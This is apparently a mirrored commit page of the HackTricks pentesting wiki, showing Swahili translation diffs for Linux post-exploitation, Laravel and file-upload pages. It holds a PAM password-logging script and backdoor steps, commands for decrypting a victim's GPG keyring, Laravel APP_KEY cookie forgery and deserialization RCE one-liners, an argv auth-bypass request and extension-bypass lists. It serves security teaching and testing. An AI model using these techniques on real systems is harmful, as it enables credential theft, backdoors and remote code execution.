maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-web/file-upload/README.md', 'src/linux-h

Browse Source
This commit is contained in:
Translator 2025-09-08 01:11:02 +00:00
parent 6dda951bef
commit 398d8deb02
4 changed files with 576 additions and 437 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

69
src/linux-hardening/linux-post-exploitation/README.md
View File

@ -4,22 +4,23 @@
## Sniffing Logon Passwords with PAM
Tuwekeze moduli ya PAM ili kurekodi kila nenosiri ambalo mtumiaji anatumia kuingia. Ikiwa hujui ni nini PAM angalia:
Wacha tuchague moduli ya PAM ili kurekodi kila password ambayo kila mtumiaji anaitumia kuingia. Ikiwa hujui PAM ni nini angalia:
{{#ref}}
pam-pluggable-authentication-modules.md
{{#endref}}
**Kwa maelezo zaidi angalia [post ya asili](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu:
**For further details check the [original post](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Hii ni muhtasari tu:
**Muhtasari wa Mbinu:**
Pluggable Authentication Modules (PAM) hutoa kubadilika katika usimamizi wa uthibitishaji kwenye mifumo ya Unix. Wanaweza kuongeza usalama kwa kubadilisha michakato ya kuingia lakini pia wanaweza kuleta hatari ikiwa zitatumika vibaya. Muhtasari huu unaelezea mbinu ya kukamata taarifa za kuingia kwa kutumia PAM, pamoja na mikakati ya kupunguza hatari.
**Technique Overview:**
Pluggable Authentication Modules (PAM) zinatoa unyumbufu katika kusimamia uthibitishaji kwenye mifumo ya Unix. Zinaboresha security kwa kuruhusu ubinafsishaji wa michakato ya login lakini pia zinaweza kuleta hatari endapo zitatumiwa vibaya. Muhtasari huu unaelezea technique ya kukamata login credentials kwa kutumia PAM, pamoja na mitigation strategies.
**Kukamata Taarifa:**
**Capturing Credentials:**
- Skripti ya bash inayoitwa `toomanysecrets.sh` imeandaliwa ili kurekodi majaribio ya kuingia, ikikamata tarehe, jina la mtumiaji (`$PAM_USER`), nenosiri (kupitia stdin), na IP ya mwenyeji wa mbali (`$PAM_RHOST`) kwenye `/var/log/toomanysecrets.log`.
- Skripti hiyo imefanywa kuwa executable na kuunganishwa kwenye usanidi wa PAM (`common-auth`) kwa kutumia moduli ya `pam_exec.so` yenye chaguzi za kufanya kazi kimya na kufichua tokeni ya uthibitishaji kwa skripti.
- Njia hii inaonyesha jinsi mwenyeji wa Linux aliyeathirika anavyoweza kutumika kukamata taarifa kwa siri.
- Script ya bash yenye jina `toomanysecrets.sh` imeandikwa ili kurekodi jaribio za login, ikichukua tarehe, jina la mtumiaji (`$PAM_USER`), password (kupitia stdin), na IP ya host ya mbali (`$PAM_RHOST`) katika `/var/log/toomanysecrets.log`.
- Script imefanywa executable na kuingizwa katika configuration ya PAM (`common-auth`) kwa kutumia module `pam_exec.so` na chaguzi za kuendesha kimya na kufikisha authentication token kwa script.
- Mbinu hii inaonyesha jinsi host ya Linux iliyovamiwa inaweza kutumika kurekodi credentials kwa utulivu.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
@ -31,23 +32,51 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh
```
### Backdooring PAM
**Kwa maelezo zaidi angalia [post ya asili](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Hii ni muhtasari tu:
**Kwa maelezo zaidi angalia [original post](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Hii ni muhtasari tu:
Moduli ya Uthibitishaji Inayoweza Kuunganishwa (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa mtumiaji. Inafanya kazi kwa dhana tatu kuu: **jina la mtumiaji**, **nenosiri**, na **huduma**. Faili za usanidi kwa kila huduma ziko katika saraka ya `/etc/pam.d/`, ambapo maktaba za pamoja hushughulikia uthibitishaji.
Pluggable Authentication Module (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa watumiaji. Inaendeshwa kwa misingi mitatu kuu: **username**, **password**, na **service**. Faili za usanidi kwa kila service ziko kwenye saraka `/etc/pam.d/`, ambapo maktaba za pamoja hushughulikia uthibitishaji.
**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa nenosiri maalum, ukipita nenosiri halisi la mtumiaji. Hii inazingatia hasa maktaba ya pamoja `pam_unix.so` inayotumiwa na faili ya `common-auth`, ambayo inajumuishwa na huduma nyingi kwa uthibitishaji wa nenosiri.
**Lengo**: Badilisha PAM ili kuruhusu uthibitishaji kwa kutumia password maalum, ukiepuka password halisi ya mtumiaji. Hii inazingatia hasa maktaba ya pamoja `pam_unix.so` inayotumika na faili `common-auth`, ambayo imejumuishwa na karibu services zote kwa password verification.
### Hatua za Kubadilisha `pam_unix.so`:
### Steps for Modifying `pam_unix.so`:
1. **Pata Mwelekeo wa Uthibitishaji** katika faili ya `common-auth`:
- Mstari unaohusika na kuangalia nenosiri la mtumiaji unaita `pam_unix.so`.
2. **Badilisha Msimbo wa Chanzo**:
- Ongeza taarifa ya masharti katika faili la chanzo la `pam_unix_auth.c` inayoruhusu ufikiaji ikiwa nenosiri lililotengwa linatumika, vinginevyo, inaendelea na mchakato wa kawaida wa uthibitishaji.
3. **Recompile na Badilisha** maktaba iliyobadilishwa `pam_unix.so` katika saraka inayofaa.
4. **Kujaribu**:
- Ufikiaji unaruhusiwa katika huduma mbalimbali (kuingia, ssh, sudo, su, screensaver) kwa nenosiri lililotengwa, wakati michakato ya kawaida ya uthibitishaji inabaki bila kuathiriwa.
1. **Locate the Authentication Directive** in the `common-auth` file:
- Mstari unaowajibika kwa kuangalia password ya mtumiaji unaitisha `pam_unix.so`.
2. **Modify Source Code**:
- Ongeza tamko la upendeleo (conditional) kwenye faili la chanzo `pam_unix_auth.c` ambalo linampa ufikiaji ikiwa password iliyowekwa mapema imetumika, vinginevyo linaendelea na mchakato wa kawaida wa authentication.
3. **Recompile and Replace** the modified `pam_unix.so` library in the appropriate directory.
- Recompile na ubadilishe maktaba `pam_unix.so` iliyorekebishwa kwenye saraka husika.
4. **Testing**:
- Ufikiaji unatolewa kwa services mbalimbali (login, ssh, sudo, su, screensaver) kwa kutumia password iliyotangazwa kabla, wakati michakato ya kawaida ya authentication haidhuriwa.
> [!TIP]
> Unaweza kujiandaa mchakato huu kwa [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
> Unaweza kuendesha mchakato huu kwa kiotomatiki kwa kutumia [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
## Decrypting GPG loot via homedir relocation
If you find an encrypted `.gpg` file and a users `~/.gnupg` folder (pubring, private-keys, trustdb) but you cant decrypt due to GnuPG homedir permissions/locks, copy the keyring to a writable location and use it as your GPG home.
Makosa ya kawaida utakayoyaona bila hili: "unsafe ownership on homedir", "failed to create temporary file", or "decryption failed: No secret key" (kwa sababu GPG haiwezi kusoma/kuandika homedir ya asili).
Workflow:
```bash
# 1) Stage a writable homedir and copy the victim's keyring
mkdir -p /dev/shm/fakehome/.gnupg
cp -r /home/victim/.gnupg/* /dev/shm/fakehome/.gnupg/
# 2) Ensure ownership & perms are sane for gnupg
chown -R $(id -u):$(id -g) /dev/shm/fakehome/.gnupg
chmod 700 /dev/shm/fakehome/.gnupg
# 3) Decrypt using the relocated homedir (either flag works)
GNUPGHOME=/dev/shm/fakehome/.gnupg gpg -d /home/victim/backup/secrets.gpg
# or
gpg --homedir /dev/shm/fakehome/.gnupg -d /home/victim/backup/secrets.gpg
```
Ikiwa nyenzo za ufunguo wa siri zipo katika `private-keys-v1.d`, GPG itafungua na ku-decrypt bila kuuliza passphrase (au itauliza ikiwa ufunguo umewekwa ulinzi).
## Marejeo
- [0xdf HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [GnuPG Manual Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
{{#include ../../banners/hacktricks-training.md}}

631
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

135
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -4,14 +4,14 @@
### Laravel SQLInjection
Soma habari kuhusu hii hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
Soma taarifa kuhusu hili hapa: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & Msingi wa Uthibitishaji (Laravel \u003e=5.6)
## APP_KEY & Undani za Encryption (Laravel \u003e=5.6)
Laravel inatumia AES-256-CBC (au GCM) na HMAC uaminifu chini ya uso (`Illuminate\\Encryption\\Encrypter`).
Ciphertext ya raw ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha JSON** kama:
Laravel inatumia AES-256-CBC (au GCM) pamoja na HMAC kwa integriti chini ya kifuniko (`Illuminate\\Encryption\\Encrypter`).
Ciphertext mbichi ambayo hatimaye **hutumwa kwa client** ni **Base64 ya JSON object** kama:
```json
{
"iv" : "Base64(random 16-byte IV)",
@ -20,7 +20,7 @@ Ciphertext ya raw ambayo hatimaye **inatumwa kwa mteja** ni **Base64 ya kitu cha
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` itafanya `serialize()` maandiko ya wazi kwa chaguo-msingi, wakati `decrypt($payload, $unserialize=true)` **itautumia kiotomatiki `unserialize()`** thamani iliyofichwa. Hivyo basi **mshambuliaji yeyote anayejua siri ya byte 32 `APP_KEY` anaweza kuunda kitu kilichofichwa cha PHP kilichosajiliwa na kupata RCE kupitia mbinu za kichawi (`__wakeup`, `__destruct`, …)**.
`encrypt($value, $serialize=true)` itafanya `serialize()` ya plaintext kwa default, wakati `decrypt($payload, $unserialize=true)` **ita `unserialize()` moja kwa moja** thamani iliyofichuliwa. Kwa hiyo **attacker yeyote anayejua siri ya 32-byte `APP_KEY` anaweza kutengeneza encrypted PHP serialized object na kupata RCE kupitia magic methods (`__wakeup`, `__destruct`, …)**.
Minimal PoC (framework ≥9.x):
```php
@ -29,12 +29,12 @@ use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Ingiza mfuatano uliozalishwa kwenye chochote kilicho hatarini `decrypt()` sink (paramu ya njia, cookie, kikao, …).
Weka string iliyotengenezwa kwenye sink yoyote yenye udhaifu ya `decrypt()` (route param, cookie, session, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) inaweka mchakato mzima kuwa otomatiki na kuongeza hali rahisi ya **bruteforce**:
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) huotomatisha mchakato mzima na inaongeza hali inayofaa ya **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
@ -45,25 +45,25 @@ laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
The script inasaidia kwa uwazi payloads za CBC na GCM na inarejesha uwanja wa HMAC/tag.
Scripti inasaidia kwa uwazi payloads za CBC na GCM na inazalisha tena uwanja wa HMAC/tag.
---
## Mifano halisi ya udhaifu
## Real-world vulnerable patterns
| Mradi | Kitu kilichoharibika | Mnyororo wa gadget |
|-------|----------------------|--------------------|
| Mradi | Sink dhaifu | Gadget chain |
|-------|-------------|--------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie wakati `Passport::withCookieSerialization()` imewezeshwa | Laravel/RCE9 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Mchakato wa unyakuzi daima ni:
1. Pata au fanya brute-force ya `APP_KEY` ya byte 32.
2. Jenga mnyororo wa gadget na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Ficha gadget iliyosajiliwa na **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana.
4. Toa ciphertext kwa sink iliyo hatarini `decrypt()` (parameta ya route, cookie, session …) ili kuanzisha **RCE**.
Mchakato wa unyonyaji ni daima:
1. Pata au jaribu kwa brute-force `APP_KEY` ya byte 32.
2. Jenga gadget chain na **PHPGGC** (kwa mfano `Laravel/RCE13`, `Laravel/RCE9` au `Laravel/RCE15`).
3. Encrypt serialized gadget kwa **laravel_crypto_killer.py** na `APP_KEY` iliyopatikana.
4. Wasilisha ciphertext kwa sink dhaifu ya `decrypt()` (route parameter, cookie, session …) ili kusababisha **RCE**.
Hapa chini kuna mistari mifupi inayoonyesha njia kamili ya shambulio kwa kila CVE halisi iliyotajwa hapo juu:
Hapo chini kuna mistari fupi (one-liners) inayoonyesha njia kamili ya shambulio kwa kila CVE ya ulimwengu halisi iliyo tajwa hapo juu:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
@ -80,41 +80,84 @@ php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
---
## Ugundaji mkubwa wa APP_KEY via cookie brute-force
## Ugunduzi wa APP_KEY wa Misa kupitia brute-force ya cookie
Kwa sababu kila jibu jipya la Laravel linaweka angalau cookie 1 iliyosimbwa (`XSRF-TOKEN` na kawaida `laravel_session`), **scanner za umma za mtandao (Shodan, Censys, …) zinatoa mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa bila mtandao.
Kwa sababu kila majibu mapya ya Laravel huweka angalau cookie iliyofichwa (`XSRF-TOKEN` na kawaida `laravel_session`), **public internet scanners (Shodan, Censys, …) leak mamilioni ya ciphertexts** ambazo zinaweza kushambuliwa offline.
Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):
* Dataset Julai 2024 » 580 k tokens, **3.99 % ya funguo zimevunjwa** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % ya funguo zimevunjwa**
* >1 000 seva bado zina hatari kutokana na CVE-2018-15133 ya zamani kwa sababu tokens zina data iliyosimbwa moja kwa moja.
* Matumizi makubwa ya funguo APP_KEYs 10 bora zimeandikwa kwa defaults ambazo zinakuja na templeti za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
* Dataset Julai 2024 » 580 k tokens, **3.99 % keys cracked** (≈23 k)
* Dataset Mei 2025 » 625 k tokens, **3.56 % keys cracked**
* >1 000 servers bado vulnerable to legacy CVE-2018-15133 kwa sababu tokens directly contain serialized data.
* Huge key reuse the Top-10 APP_KEYs ni hard-coded defaults zilizoshipwa na commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).
Zana ya kibinafsi ya Go **nounours** inasukuma throughput ya AES-CBC/GCM bruteforce hadi ~1.5 bilioni majaribio/s, ikipunguza uvunjaji wa dataset kamili hadi <2 dakika.
Chombo binafsi cha Go **nounours** kinaboresha AES-CBC/GCM bruteforce throughput hadi ~1.5 billion tries/s, kukata muda wa full dataset cracking chini ya <2 minutes.
## Hila za Laravel
## CVE-2024-52301 HTTP argv/env override → auth bypass
### Hali ya Ukarabati
Wakati PHPs `register_argc_argv=On` (kawaida kwenye distros nyingi), PHP inaonyesha array `argv` kwa HTTP requests inayotokana na query string. Matoleo ya hivi karibuni ya Laravel yalichambua hizi “CLI-like” args na kuzingatia `--env=<value>` wakati wa runtime. Hii inaruhusu kubadilisha environment ya framework kwa HTTP request ya sasa kwa kuiongeza tu kwenye URL yoyote:
Ikiwa Laravel iko katika **hali ya ukarabati** utaweza kufikia **kod** na **data nyeti**.\
- Quick check:
- Tembelea `https://target/?--env=local` au kamba yoyote na tazama mabadiliko yanayotegemea environment (debug banners, footers, verbose errors). Ikiwa kamba inaonekana reflected, override inafanya kazi.
- Impact example (business logic trusting a special env):
- Ikiwa app ina matawi kama `if (app()->environment('preprod')) { /* bypass auth */ }`, unaweza kuthibitisha bila creds sahihi kwa kutuma login POST kwa:
- `POST /login?--env=preprod`
- Notes:
- Inaenda kwa kila-request, hakuna persistence.
- Inahitaji `register_argc_argv=On` na vulnerable Laravel version inayosoma argv kwa HTTP.
- Primitive muhimu kuonyesha errors zaidi katika “debug” envs au kuamsha code paths zilizo gatwa na environment.
- Mitigations:
- Zima `register_argc_argv` kwa PHP-FPM/Apache.
- Update Laravel ili isibris argv kwenye HTTP requests na ondoa assumptions za trust zinazohusiana na `app()->environment()` katika production routes.
Minimal exploitation flow (Burp):
```http
POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf
```
---
## Triki za Laravel
### Hali ya debugging
Ikiwa Laravel iko katika **debugging mode** utaweza kupata **code** na **sensitive data**.\
Kwa mfano `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
Hii kwa kawaida inahitajika kwa ajili ya kutumia CVEs nyingine za RCE za Laravel.
Hali hii kawaida inahitajika kwa ku-exploit CVE nyingine za Laravel RCE.
### Fingerprinting & exposed dev endpoints
Ukaguzi mfupi wa haraka kutambua stack ya Laravel na zana hatari za dev zilizo wazi katika production:
- `/_ignition/health-check` → Ignition present (debug tool used by CVE-2021-3129). Ikiwa inafikika bila uthibitishaji, app inaweza kuwa katika debug au imepangwa vibaya.
- `/_debugbar` → Laravel Debugbar assets; mara nyingi inaashiria debug mode.
- `/telescope` → Laravel Telescope (dev monitor). Ikiwa ni public, tarajia ufichaji mkubwa wa taarifa na vitendo vinavyowezekana.
- `/horizon` → Queue dashboard; version disclosure na wakati mwingine vitendo vilivyolindwa na CSRF.
- `X-Powered-By`, cookies `XSRF-TOKEN` and `laravel_session`, and Blade error pages pia husaidia kutambulisha.
```bash
# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done
```
### .env
Laravel huhifadhi APP inayotumia kusimbua cookies na akreditivu nyingine ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia njia fulani ya kupita: `/../.env`
Laravel huhifadhi APP inayotumiwa ku-encrypt cookies na taarifa nyingine za uthibitisho ndani ya faili inayoitwa `.env` ambayo inaweza kufikiwa kwa kutumia path traversal chini ya: `/../.env`
Laravel pia itaonyesha habari hii ndani ya ukurasa wa ukarabati (ambao unaonekana wakati Laravel inapata kosa na umewezeshwa).
Laravel pia itaonyesha taarifa hii ndani ya ukurasa wa debug (unaoonekana wakati Laravel inapata kosa na debug imewezeshwa).
Kwa kutumia APP_KEY ya siri ya Laravel unaweza kusimbua na kusimbua tena cookies:
Kwa kutumia APP_KEY ya siri ya Laravel unaweza decrypt na re-encrypt cookies:
### Futa Cookie
### Decrypt Cookie
```python
import os
import json
@ -169,30 +212,34 @@ return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
app_key ='HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
key = base64.b64decode(app_key)
decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlhcL1JGY0t6YzhaaGNHR1duSktIdjF1elwvNXhrd1Q4SVlXMzBrbTV0MWk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9')
#b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')
decrypt('eyJpdiI6ImJ3TzlNRjV6bXFyVjJTdWZhK3JRZ1E9PSIsInZhbHVlIjoiQ3kxVDIwWkRFOE1sXC9iUUxjQ2IxSGx1V3MwS1BBXC9KUUVrTklReit0V2k3TkMxWXZJUE02cFZEeERLQU1PV1gxVForYkd1dWNhY3lpb2Nmb0J6YlNZR28rVmk1QUVJS3YwS3doTXVHSlxcL1JGY0t6YzhaaGNHR1duSktIdjF1elxcLzV4a3dUOElZVzMw aG01dGk5MXFkSmQrMDJMK2F4cFRkV0xlQ0REVU1RTW5TNVMrNXRybW9rdFB4VitTcGQ0QlVlR3Vwam1IdERmaDRiMjBQS05VXC90SzhDMUVLbjdmdkUyMnQyUGtadDJHSEIyQm95SVQxQzdWXC9JNWZKXC9VZHI4Sll4Y3ErVjdLbXplTW4yK25pTGxMUEtpZVRIR090RlF0SHVkM0VaWU8yODhtaTRXcVErdUlhYzh4OXNacXJrVytqd1hjQ3FMaDhWeG5NMXFxVXB1b2V2QVFIeFwvakRsd1pUY0h6UUR6Q0UrcktDa3lFOENIeFR0bXIrbWxOM1FJaVpsTWZkSCtFcmd3aXVMZVRKYXl0RXN3cG5EMitnanJyV0xkU0E3SEUrbU0rUjlENU9YMFE0eTRhUzAyeEJwUTFsU1JvQ3d3UnIyaEJiOHA1Wmw1dz09IiwibWFjIjoiNmMzODEzZTk4MGRhZWVhMmFhMDI4MWQzMmRkNjgwNTVkMzUxMmY1NGVmZWUzOWU4ZTJhNjBiMGI5Mjg2NzVlNSJ9')
#b'{"data":"a:6:{s:6:\"_token\";s:40:\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\";s:8:\"username\";s:8:\"guestc32\";s:5:\"order\";s:2:\"id\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
encrypt(b'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\";}}","expires":1605141157}')
```
### Laravel Deserialization RCE
Tofauti zinazoweza kutumika: 5.5.40 na 5.6.x kupitia 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Toleo zilizo hatarini: 5.5.40 na 5.6.x hadi 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))
Hapa unaweza kupata taarifa kuhusu udhaifu wa deserialization hapa: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Hapa unaweza kupata taarifa kuhusu deserialization vulnerability: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Unaweza kujaribu na kutumia kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kutumia metasploit: `use unix/http/laravel_token_unserialize_exec`
Unaweza kujaribu na kui-exploit ukitumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au unaweza pia kui-exploit kwa kutumia metasploit: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
Udhaifu mwingine wa deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
## References
## Marejeo
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf HTB Environment (CVE202452301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
{{#include ../../banners/hacktricks-training.md}}

176
src/pentesting-web/file-upload/README.md
View File

@ -1,10 +1,10 @@
# File Upload
# Kupakia Faili
{{#include ../../banners/hacktricks-training.md}}
## File Upload General Methodology
## Mbinu za Jumla za Kupakia Faili
Other useful extensions:
Extensions nyingine muhimu:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
@ -17,11 +17,11 @@ Other useful extensions:
### Bypass file extensions checks
1. If they apply, the **check** the **previous extensions.** Also test them using some **uppercase letters**: _pHp, .pHP5, .PhAr ..._
2. _Check **adding a valid extension before** the execution extension (use previous extensions also):_
1. Ikiwa zinatumika, **kagua** **extensions zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Kagua **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia extensions zilizotajwa pia):_
- _file.png.php_
- _file.png.Php5_
3. Try adding **special characters at the end.** You could use Burp to **bruteforce** all the **ascii** and **Unicode** characters. (_Note that you can also try to use the **previously** motioned **extensions**_)
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa **ascii** na **Unicode** herufi. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa hapo awali_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
@ -31,7 +31,7 @@ Other useful extensions:
- _file._
- _file.php...._
- _file.pHp5...._
4. Try to bypass the protections **tricking the extension parser** of the server-side with techniques like **doubling** the **extension** or **adding junk** data (**null** bytes) between extensions. _You can also use the **previous extensions** to prepare a better payload._
